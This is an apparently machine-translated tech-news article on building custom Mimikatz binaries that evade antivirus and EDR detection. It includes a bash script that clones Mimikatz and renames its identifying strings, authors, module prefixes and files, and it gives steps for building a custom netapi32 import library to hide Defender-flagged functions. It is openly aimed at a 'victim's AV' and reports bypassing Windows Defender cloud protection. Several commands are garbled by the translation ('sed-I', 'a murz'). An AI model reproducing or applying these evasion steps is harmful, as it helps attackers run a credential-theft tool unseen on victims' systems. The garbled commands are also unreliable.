Shulou(Shulou.com)06/02 Report--

This article shows you how to build custom Mimikatz binaries, which are concise and easy to understand, which will definitely brighten your eyes. I hope you can get something through the details of this article.

Introduction

How to build custom Mimikatz binaries by modifying the source code and bypass anti-virus / terminal detection and response products.

There are a lot of technical articles about Mimikatz obfuscation in the community, but most of them focus on how to get Invoke-Mimikatz to bypass AMSI or directly use the PowerShell version of obfuscation tools. However, I chose to build a custom version of Mimikatz that will not be marked by antivirus products:

# This script downloads and slightly "obfuscates" the mimikatz project.# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com"..., # so removing them from the project before compiling gets us past most of the AV solutions.# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth", # but this needs adapting to the doc, so it has not been done Try it if your victim's AV still detects mimikatz after this program. Git clone https://github.com/gentilkiwi/mimikatz.git windowsmv windows/mimikatz windows/windowsfind windows/-type f-print0 | xargs-0 sed-I 's/mimikatz/windows/g'find windows/-type f-print0 | xargs-0 sed-I' s/MIMIKATZ/WINDOWS/g'find windows/-type f-print0 | xargs-0 sed-I 's/Mimikatz/Windows/g'find windows/-type f-print0 | xargs-0 sed-I' s/DELPY/James/g 'find windows/-type f-print0 | xargs-0 sed-I 's/Benjamin/Troy/g'find windows/-type f-print0 | xargs-0 sed-I' s/benjamin@gentilkiwi.com/jtroy@hotmail.com/g'find windows/-type f-print0 | xargs-0 sed-I 's/creativecommons/python/g'find windows/-type f-print0 | xargs-0 sed-I' s/gentilkiwi/MSOffice/g'find windows/-type f-print0 | xargs -0 sed-I 's/KIWI/ONEDRIVE/g'find windows/-type f-print0 | xargs-0 sed-I' s/Kiwi/Onedrive/g'find windows/-type f-print0 | xargs-0 sed-I 's/kiwi/onedrive/g'find windows/-type f-name' * mimikatz*' | while read FILE Donewfile= "$(echo ${FILE} | sed-e's swap mimikatz while read FILE)"; mv "${FILE}"${newfile}"; donefind windows/-type f-name'* kiwi*' | while read FILE; donewfile= "$(echo ${FILE} | sed-e's UniMimix onward sed)"; mv "${FILE}"${newfile}"; Done;

Next, let's take a look at how to build a custom Mimikatz binary.

Mimikatz contains virus

There is no doubt that every Mimikatz distribution you download will be marked as malware by anti-virus products, as many attackers will choose to use Mimikatz and other open source projects to carry out various attacks. Obviously, there are a lot of people who don't know why these open source projects are tagged and how they are tagged:

Real attackers and penetration testers generally do not directly choose to use the release version of the project, but usually choose to use their own custom build. Generally speaking, they will only choose to use part of the source code of Mimikatz. In this case, we will modify the source code while retaining the original features to evaluate its detection rate. Therefore, using custom source files is still our best practice.

Basic characteristics

For the characteristics of Mimikatz, we first need to replace the following strings:

1. Mimikatz, MIMIKATZ and Mimikatz

2 、 DELPY, Benjamin, benjamin@gentilkiwi.com

3 、 creativecommons

4 、 gentilkiwi

5. KIWI, Kiwi and kiwi

From the antivirus vendor's point of view, the first thing you need to mark is these strings in the source file. If you open the Mimikatz menu, you will see the information shown in the following figure:

All the strings in the menu prove that Mimikatz is running, so we need to add the following feature strings to the script to replace them:

"A La Vie, A L'Amour" http://blog.gentilkiwi.com/mimikatzVincent LE TOUXvincent.letoux@gmail.com http://pingcastle.comhttp://mysmartlogon.com

We can also directly open the mimikatz.c file and replace the Banner, or delete them directly.

Next, we need to replace some functional keywords. The main modules in Mimikatz are as follows:

1 、 crypto, dpapi, kerberos, lsadump, ngc, sekurlsa2 、 standard, privilege, process, service, ts, event3 、 misc, token, vault, minesweeper, net, busylight4 、 sysenv, sid, iis, rpc, sr98, rdm, acr

We can also enter an invalid module name (for example::) to display all available modules:

Here, we have two choices. Either replace all function names with all uppercase letters, or modify the function name directly. For the first method, the functions we are familiar with are equivalent to no change. But for the second method, we have to remember the new function name. At present, we choose to continue to use the familiar function name, because I am afraid that if I am not careful, it will destroy its original function. To build a custom binary for each new version, we replace strings that are independent of the function name with random names.

Another important thing to replace is the icon of the binary file. Therefore, in the modified version of gist, we replace the existing icons with some randomly downloaded icons.

Each function in the main menu has subfunctions. For example, the most famous function, sekurlsa, contains the following subfunctions:

1 、 msv, wdigest, kerberos, tspkg2 、 livessp, cloudap, ssp, logonpasswords3 、 process, minidump, bootkey, pth4 、 krbtgt, dpapisystem, trust, backupkeys5 、 tickets, ekeys, dpapi, credman

Make sure that most of the familiar Mimikatz identifiers have been modified, including the subfunction name. Script sample code: [click I get].

By executing the Bash script, compiling the code, and uploading it to VirusToal, we will see the following results:

The detection rate of 25plus 67, but it is certainly not enough.

Netapi32.dll

To find more features, we can use the following command to split the file into multiple parts:

Head-c byteLength mimikatz.exe > split.exe

If the result file is deleted, it means that there are features in it. If it is not deleted, then this part of the file is safe. You can also automate this task using the DefenderCheck tool. To put it simply, split the file into multiple parts, copy them to the C:\ temp\ directory, and scan them with Windows Defender:

The following three functions in netapi32.dll are marked with Windows Defender:

I_NetServerAuthenticate2I_NetServerReqChallengeI_NetServerTrustPasswordsGet

Here, we can create a .def file that contains the following to build a custom netapi32.min.lib:

L

IBRARY netapi32.dllEXPORTS I_NetServerAuthenticate2 @ 59 I_NetServerReqChallenge @ 65 I_NetServerTrustPasswordsGet @ 62

At this point, we can use the following command to build the netapi32.min.lib file in the Visual Studio developer terminal:

Lib / DEF:netapi32.def / OUT:netapi32.min.lib

We embed this file into the lib\ x64\ directory and recompile it. After running DefenderCheck again, nothing will be detected:

This means that we have bypassed Windows Defender's "real-time protection" feature. However, if we enable cloud protection and then copy the file to another location, it will still be detected:

Replace more strings

Of course, we still have a lot to replace. First of all, we have to deal with the more obvious strings. The Mimikatz menu contains an introduction to each function. For example, the subfunction privilege has the following description:

Here, we can replace all the descriptions by adding them as strings to our Bash script. But not all are needed, such as the following:

Answer-Answer to the Ultimate Question of Life, the Universe, and Everythingcoffee-Please, make me a coffee!

Many antivirus manufacturers will also mark the relevant functional DLL file loading behavior. Mimikatz needs to load a lot of functions from .DLL files. In order to find the relevant DLL files in the Mimikatz source code, we need to open Visual Studio and press STRG + SHIFT + F. At this point, you will be able to search the entire project, search .dll to see all the DLL files used in the project, and then add them to the Bash script for name replacement.

Directory & file structure

The directory structure of the entire project also seems to be one of the bases for anti-virus product detection, where all available function names seem to be prefixed with kuhl_ or KULL_:

We can directly replace these prefixes:

Kuhl=$ (cat / dev/urandom | tr-dc "a type z" | fold-w 4 | head-n 1) find windows/-type f-print0 | xargs-0 sed-I "s/kuhl/$kuhl/g" kull=$ (cat / dev/urandom | tr-dc "a murz" | fold-w 4 | head-n 1) find windows/-type f-print0 | xargs-0 sed-I "s/kull/$kull/g" find windows/-type f-name "* kuhl*" | while read FILE Donewfile= "$(echo ${FILE} | sed-e" s/kuhl/$kuhl/g ")"; mv "${FILE}"${newfile}"; done find windows/-type f-name "* kull*" | while read FILE; donewfile= "$(echo ${FILE} | sed-e" s/kull/$kull/g ")"; mv "${FILE}" ${newfile} " Done under=$ (cat / dev/urandom | tr-dc "amurz" | fold-w 4 | head-n 1) find windows/-type f-print0 | xargs-0 sed-I "s/_m_/$under/g" find windows/-type f-name "* _ masks *" | while read FILE; donewfile= "$(echo ${FILE} | sed-e" s/_m_/$under/g ")"; mv "${FILE}"${newfile}"; Done

Bash script: [click I get]

After executing the Bash script, compile and upload it to Virustotal:

Although the detection rate has not changed much, it is now possible to bypass Windows Defender with cloud protection enabled:

The above is how to build custom Mimikatz binaries. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.